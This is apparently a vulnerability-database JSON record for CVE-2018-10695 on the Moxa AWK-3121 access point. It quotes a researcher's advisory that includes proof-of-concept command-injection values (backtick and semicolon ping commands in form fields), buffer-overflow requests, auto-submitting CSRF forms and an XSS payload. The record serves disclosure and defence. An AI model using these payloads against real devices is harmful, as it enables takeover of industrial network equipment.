"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2018-10695",
"trust": 1.8,
"value": "HIGH"
},
{
"author": "CNNVD",
"id": "CNNVD-201906-323",
"trust": 0.6,
"value": "HIGH"
},
{
"author": "VULHUB",
"id": "VHN-120480",
"trust": 0.1,
"value": "MEDIUM"
},
{
"author": "VULMON",
"id": "CVE-2018-10695",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120480"
},
{
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"db": "NVD",
"id": "CVE-2018-10695"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An issue was discovered on Moxa AWK-3121 1.14 devices. It provides alert functionality so that an administrator can send emails to his/her account when there are changes to the device\u0027s network. However, the same functionality allows an attacker to execute commands on the device. The POST parameters \"to1,to2,to3,to4\" are all susceptible to buffer overflow. By crafting a packet that contains a string of 678 characters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. A buffer error vulnerability exists in Moxa AWK-3121 version 1.14. This vulnerability stems from the incorrect verification of data boundaries when the network system or product performs operations on the memory, resulting in incorrect read and write operations to other associated memory locations. \n The device by default allows HTTP traffic thus\n providing an insecure communication mechanism for a user connecting to\n the web server. This allows an attacker to sniff the traffic easily and\n allows an attacker to compromise sensitive data such as credentials. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n HTTP traffic by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the HTTP traffic passing between the user and the device by using a MITM attack such as ARP poisoning. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n \n2. \n It is intended that an administrator can download /systemlog.log (the system\n log). \n \n ------------------------------------------\n \n [Additional Information]\n POC \n http://192.168.127.253//systemlog.log\n \n ------------------------------------------\n \n [Vulnerability Type]\n Incorrect Access Control\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can navigate to URL and download the systemlog file without any authentication or authorization\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n3. \n The session cookie \"Password508\" does not have an HttpOnly flag. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Missing HttpOnly flag on session cookie\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can use cross-site scripting attack to access the session cookie \"Password508\" which can allow an attacker to login into the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n4. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=6d86219d9cca208c1085cce81fdd31f0\n \n srvName=AAAAAA (etc.) EEEEEE\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a buffer overflow on the device\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n5. \n The device provides a Wi-Fi connection that is open and does not use\n any encryption mechanism by default. An administrator who uses the\n open wireless connection to set up the device can allow an\n attacker to sniff the traffic passing between the user\u0027s computer and the\n device. This can allow an attacker to steal the credentials passing\n over the HTTP connection as well as TELNET traffic. Also an attacker\n can MITM the response and infect a user\u0027s computer very easily as\n well. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Open WiFi Connection\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Device\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can monitor the Wifi channels using Kismet or some other\n opensource software and an wireless card in monitor mode and sniff all\n the traffic including HTTP traffic as well as SSH and Telnet traffic. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n6. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_SendTestEmail HTTP/1.1\n Cookie: Password508=fab7f1d1efa604721aa70cf5a1ad163f\n \n server=server.mail.com\u0026username=test\u0026password=test\u0026from=test@mail.com\u0026to1=AAAAAAAAAA (etc.)\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n7. \n The device provides a web interface to allow an administrator to\n manage the device. \n \n ------------------------------------------\n \n [Additional Information]\n POC to change name of the device \n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK-ROMEO\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/webSetMainRestart\" method=\"GET\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"SaveValue\" value=\"1\" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Request Forgery (CSRF)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can trick an administrator of the device to visit an\n attacker controlled page while connected to the network and thus trick\n to change the password or any other setting\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n8. \n The Moxa AWK 3121 provides ping functionality so that an administrator\n can execute ICMP calls to check if the network is working correctly. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n POST /forms/webSetPingTrace HTTP/1.1\n Cookie: Password508=e07f98b965bcc5abfe11c9c763b2d333\n \n srvName=192.168.127.102;ping -c 8 192.168.127.101;##\u0026option=0\u0026bkpath=%2Fping_trace.asp\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in Ping functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK 3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n9. \n The device enables an unencrypted TELNET service by default. This allows an\n attacker who has been able to gain an MITM position to easily sniff the\n traffic between the device and the user. Also an attacker can easily\n connect to the TELNET daemon using the default credentials if they have\n not been changed by the user. \n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Insecure service Telnet enabled by default\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Telnet daemon\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n An attacker can sniff the traffic passing between the device and user by using a MITM attack such as ARP poisoning\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n10. \n The Moxa AWK 3121 provides certfile upload functionality so that an\n administrator can upload a certificate file used for connecting to the\n wireless network. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_certUpload HTTP/1.1\n Cookie: Password508=68abf30ef8176a4248320929e04df562\n \n ... 114782935826962\n Content-Disposition: form-data; name=\"iw_privatePass\"\n \n ;`ping -c 9 192.168.127.103` ##\n ... 114782935826962\n Content-Disposition: form-data; name=\"bkpath\"\n \n /wireless_cert.asp?index=1\n ... 114782935826962\n Content-Disposition: form-data; name=\"certSection\"\n \n certWlan\n ... 114782935826962\n Content-Disposition: form-data; name=\"rfindex\"\n \n 0\n ... 114782935826962\n Content-Disposition: form-data; name=\"Submit\"\n \n Submit\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile1\"\n \n test.txt\n ... 114782935826962\n Content-Disposition: form-data; name=\"certFile\"; filename=\"blob\"\n Content-Type: text/xml\n \n \u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\n ... 114782935826962--\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in file upload\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n11. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \u003chtml\n \u003cbody\n \u003cform id=\"f\" action=\"http://192.168.127.253/forms/iw_webSetParameters\" method=\"POST\" enctype=\"application/x-www-form-urlencoded\"\n \u003cinput type=\"hidden\" name=\"iw_board_deviceName\" value=\"AWK\u003c\\/td\u0027);alert(1);//\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceLocation\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceDescription\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"iw_board_deviceContactInfo\" value=\"\" /\n \u003cinput type=\"hidden\" name=\"Submit\" value=\"Submit\" /\n \u003cinput type=\"hidden\" name=\"bkpath\" value=\"/sysinfo.asp \" /\n \u003c/form\n \u003cscript\n setTimeout(\"document.forms[\u0027f\u0027].submit();\",1);\n \u003c/script\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [Vulnerability Type]\n Cross Site Scripting (XSS)\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.9\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Escalation of Privileges]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute a stored XSS on the device. \n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n12. \n \n ------------------------------------------\n \n [Additional Information]\n POC \n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=071b1093656adca3510d5e32f69737ec\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABBBBCCCC\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n `ping -c 3 192.168.127.101`\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n13. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n \n \u003chtml\n \u003cbody\n \u003cscript\n function submitRequest()\n {\n var formData = new FormData();\n \n formData.append(\"iw_filename\", \";`ping -c 9 192.168.127.103` ##\");\n formData.append(\"iw_storage\", \"tftp\");\n formData.append(\"iw_serverip\", \"192.168.1.101\");\n formData.append(\"bkpath\", \"/wireless_cert.asp?index=1\");\n \n // HTML file input, chosen by user\n formData.append(\"certFile1\", \"test.txt\");\n \n // JavaScript file-like object\n var content = \u0027\u003ca id=\"a\"\u003cb id=\"b\"hey!\u003c/b\u003c/a\u0027; // the body of the new file... \n var blob = new Blob([content], { type: \"text/xml\"});\n \n formData.append(\"certFile\", blob);\n \n var request = new XMLHttpRequest();\n request.open(\"POST\", \"http://192.168.127.253/forms/web_certUpload\");\n request.send(formData);\n }\n \u003c/script\n \u003cform action=\"#\"\n \u003cinput type=\"submit\" value=\"Submit request\" onclick=\"submitRequest();\" /\n \u003c/form\n \u003c/body\n \u003c/html\n \n ------------------------------------------\n \n [VulnerabilityType Other]\n Command injection in web runscript functionality\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n\n14. \n \n ------------------------------------------\n \n [Additional Information]\n POC\n POST /forms/web_runScript HTTP/1.1\n Cookie: Password508=c629f1b9d18c3d751da6d7b1fd43e628\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_filename\"; filename=\"XXXX\"\n Content-Type: application/octet-stream\n \n ls -ltr\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_storage\"\n \n tftp\n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"iw_serverip\"\n \n AAAAAAAAAAAAAAAAAA (etc.)\n \n ... 7e21a62f2905ca\n Content-Disposition: form-data; name=\"bkpath\"\n \n /Troubleshooting.asp\n ... 7e21a62f2905ca--\n \n ------------------------------------------\n \n [Vulnerability Type]\n Buffer Overflow\n \n ------------------------------------------\n \n [Vendor of Product]\n Moxa\n \n ------------------------------------------\n \n [Affected Product Code Base]\n AWK-3121 - 1.14\n \n ------------------------------------------\n \n [Affected Component]\n Web Server -- iw_webs (Goahead)\n \n ------------------------------------------\n \n [Attack Type]\n Remote\n \n ------------------------------------------\n \n [Impact Code execution]\n true\n \n ------------------------------------------\n \n [Impact Information Disclosure]\n true\n \n ------------------------------------------\n \n [Attack Vectors]\n Use XSRF form to trick an admin into submitting the request and execute the buffer overflow\n \n ------------------------------------------\n \n [Reference]\n https://www.moxa.com/Event/Tech/2008/AWK-3121/index.htm\n \n ------------------------------------------\n \n [Discoverer]\n Samuel Huntley\n\n",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-10695"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"db": "VULHUB",
"id": "VHN-120480"
},
{
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"db": "PACKETSTORM",
"id": "153223"
}
],
"trust": 1.89
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-10695",
"trust": 2.7
},
{
"db": "PACKETSTORM",
"id": "153223",
"trust": 1.9
},
{
"db": "ICS CERT",
"id": "ICSA-19-337-02",
"trust": 1.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201906-323",
"trust": 0.7
},
{
"db": "AUSCERT",
"id": "ESB-2019.4544",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-120480",
"trust": 0.1
},
{
"db": "VULMON",
"id": "CVE-2018-10695",
"trust": 0.1
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120480"
},
{
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10695"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
]
},
"id": "VAR-201906-0785",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "VULHUB",
"id": "VHN-120480"
}
],
"trust": 0.01
},
"last_update_date": "2023-12-18T12:00:03.580000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "AWK-3121 Series",
"trust": 0.8,
"url": "https://www.moxa.com/en/products/phased-out-products/awk-3121-series"
},
{
"title": "Moxa_AWK_1121",
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121 "
}
],
"sources": [
{
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-119",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120480"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"db": "NVD",
"id": "CVE-2018-10695"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.6,
"url": "https://github.com/samuelhuntley/moxa_awk_1121/blob/master/moxa_awk_1121"
},
{
"trust": 1.8,
"url": "https://seclists.org/bugtraq/2019/jun/8"
},
{
"trust": 1.8,
"url": "http://packetstormsecurity.com/files/153223/moxa-awk-3121-1.14-information-disclosure-command-execution.html"
},
{
"trust": 1.5,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10695"
},
{
"trust": 1.4,
"url": "https://www.us-cert.gov/ics/advisories/icsa-19-337-02"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-10695"
},
{
"trust": 0.6,
"url": "https://www.auscert.org.au/bulletins/esb-2019.4544/"
},
{
"trust": 0.1,
"url": "https://cwe.mitre.org/data/definitions/119.html"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov"
},
{
"trust": 0.1,
"url": "https://github.com/samuelhuntley/moxa_awk_1121"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10702"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10699"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10701"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10693"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10698"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/websetmainrestart\""
},
{
"trust": 0.1,
"url": "https://www.moxa.com/event/tech/2008/awk-3121/index.htm"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10696"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10703"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10690"
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/iw_websetparameters\""
},
{
"trust": 0.1,
"url": "http://192.168.127.253/forms/web_certupload\");"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10694"
},
{
"trust": 0.1,
"url": "http://192.168.127.253//systemlog.log"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10691"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10697"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10700"
},
{
"trust": 0.1,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-10692"
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-120480"
},
{
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10695"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "VULHUB",
"id": "VHN-120480"
},
{
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"db": "PACKETSTORM",
"id": "153223"
},
{
"db": "NVD",
"id": "CVE-2018-10695"
},
{
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-07T00:00:00",
"db": "VULHUB",
"id": "VHN-120480"
},
{
"date": "2019-06-07T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"date": "2019-06-20T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"date": "2019-06-07T22:22:22",
"db": "PACKETSTORM",
"id": "153223"
},
{
"date": "2019-06-07T20:29:00.467000",
"db": "NVD",
"id": "CVE-2018-10695"
},
{
"date": "2019-06-07T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2019-06-11T00:00:00",
"db": "VULHUB",
"id": "VHN-120480"
},
{
"date": "2019-06-11T00:00:00",
"db": "VULMON",
"id": "CVE-2018-10695"
},
{
"date": "2019-12-04T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-015614"
},
{
"date": "2019-06-11T14:49:19.700000",
"db": "NVD",
"id": "CVE-2018-10695"
},
{
"date": "2019-12-04T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "Moxa AWK-3121 Device buffer error vulnerability",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-015614"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "buffer error",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201906-323"
}
],
"trust": 0.6
}
}
VAR-201906-0789
Vulnerability from variot - Updated: 2023-12-18 12:00An issue was discovered on Moxa AWK-3121 1.14 devices. The Moxa AWK 3121 provides certfile upload functionality so that an administrator can upload a certificate file used for connecting to the wireless network. However, the same functionality allows an attacker to execute commands on the device. The POST parameter "iw_privatePass" is susceptible to this injection. By crafting a packet that contains shell metacharacters, it is possible for an attacker to execute the attack. Moxa AWK-3121 The device contains a command injection vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. Moxa AWK-3121 is an industrial-grade wireless access point produced by Moxa Corporation of Taiwan, China. This vulnerability stems from the fact that the network system or product does not correctly filter special elements in the process of constructing executable commands from external input data. The device by default allows HTTP traffic thus providing an insecure communication mechanism for a user connecting to the web server. This allows an attacker to sniff the traffic easily and allows an attacker 